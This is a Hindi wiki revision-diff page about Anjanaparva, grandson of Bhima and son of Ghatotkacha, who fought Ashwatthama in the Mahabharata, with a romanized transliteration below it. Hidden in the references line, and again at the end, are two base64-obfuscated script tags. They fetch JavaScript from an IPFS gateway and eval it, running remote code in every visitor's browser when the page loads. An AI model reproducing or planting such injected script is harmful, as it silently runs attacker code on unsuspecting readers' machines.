Difference between revisions of "अंजनपर्वा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('भीमसेन के पौत्र तथा घटोत्कच के पुत्र का नाम '''...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
[[भीम|भीमसेन]] के पौत्र तथा [[घटोत्कच]] के पुत्र का नाम '''अंजनपर्वा''' था। [[महाभारत]] के युद्ध में उसने भी [[पाण्डव|पाण्डवों]] को सहयोग प्रदान किया था। [[अश्वत्थामा]] से युद्ध करते हुए वह कभी आकाश से पत्थर, पेड़ों की वर्षा करता, कभी माया का प्रसार करता और कभी आमने-सामने रथ पर चढ़कर प्रसार युद्ध करता। अश्वत्थामा ने उस वीर का हनन किया था।
+
'''अंजनपर्वा''' [[भीम|भीमसेन]] का पौत्र तथा [[घटोत्कच]] का पुत्र का था।
 +
*[[महाभारत]] के युद्ध में अंजनपर्वा ने भी [[पाण्डव|पाण्डवों]] को सहयोग प्रदान किया था।
 +
*[[अश्वत्थामा]] से युद्ध करते हुए वह कभी आकाश से पत्थर, पेड़ों की वर्षा करता, कभी माया का प्रसार करता और कभी आमने-सामने रथ पर चढ़कर प्रसार युद्ध करता।
 +
*अश्वत्थामा ने उस वीर का हनन (वध) किया था।
  
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==

Revision as of 14:17, 19 October 2011

aanjanaparva bhimasen ka pautr tatha ghatotkach ka putr ka tha.

  • mahabharat ke yuddh mean aanjanaparva ne bhi pandavoan ko sahayog pradan kiya tha.
  • ashvatthama se yuddh karate hue vah kabhi akash se patthar, pe doan ki varsha karata, kabhi maya ka prasar karata aur kabhi amane-samane rath par chadhakar prasar yuddh karata.
  • ashvatthama ne us vir ka hanan (vadh) kiya tha.


tika tippani aur sandarbh

bharatiy mithak kosh |lekhak: d aauktar usha puri vidyavachaspati |prakashak: neshanal pablishiang haus, nee dilli |prishth sankhya: 02 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>